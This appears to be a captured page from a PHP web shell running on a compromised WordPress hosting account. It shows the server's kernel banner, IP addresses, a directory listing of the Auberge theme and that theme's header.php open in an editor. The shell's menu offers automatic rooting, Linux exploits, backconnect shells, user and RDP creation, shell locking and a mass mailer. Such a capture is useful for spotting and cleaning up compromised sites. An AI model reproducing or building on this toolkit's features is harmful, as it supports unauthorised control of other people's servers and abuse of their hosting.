Linux webm010.cluster103.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.103.20.10 | : 216.73.217.75
Cant Read [ /etc/named.conf ]
7.4.33
cuisinesj
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
cuisinesj /
www /
new /
wp-content /
themes /
auberge /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
library
[ DIR ]
drwxr-xr-x
page-template
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
404.php
648
B
-rw-r--r--
archive.php
651
B
-rw-r--r--
changelog.md
25.82
KB
-rw-r--r--
comments.php
2.86
KB
-rw-r--r--
footer-credits.php
1.84
KB
-rw-r--r--
footer.php
524
B
-rw-r--r--
functions.php
687
B
-rw-r--r--
header.php
881
B
-rw-r--r--
image.php
304
B
-rw-r--r--
index.php
524
B
-rw-r--r--
license.txt
34.32
KB
-rw-r--r--
page.php
323
B
-rw-r--r--
readme.txt
1.64
KB
-rw-r--r--
screenshot.jpg
122.67
KB
-rw-r--r--
search.php
673
B
-rw-r--r--
sidebar-footer.php
785
B
-rw-r--r--
sidebar-front-page.php
808
B
-rw-r--r--
sidebar.php
970
B
-rw-r--r--
single.php
716
B
-rw-r--r--
style.css
1.37
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.php
<?php /** * Website header template * * @package Auberge * @copyright WebMan Design, Oliver Juhas * * @since 1.0 * @version 2.7.1 */ do_action( 'tha_html_before' ); ?> <html class="no-js" <?php language_attributes(); ?>> <head> <?php do_action( 'tha_head_top' ); do_action( 'tha_head_bottom' ); wp_head(); ?> </head> <body id="top" <?php body_class(); echo wm_schema_org( 'WebPage' ); ?>> <?php if ( function_exists( 'wp_body_open' ) ) { wp_body_open(); } else { do_action( 'wp_body_open' ); } do_action( 'tha_body_top' ); if ( ! apply_filters( 'wmhook_disable_header', false ) ) { do_action( 'tha_header_before' ); do_action( 'tha_header_top' ); do_action( 'tha_header_bottom' ); do_action( 'tha_header_after' ); } do_action( 'tha_content_before' ); do_action( 'tha_content_top' );
Close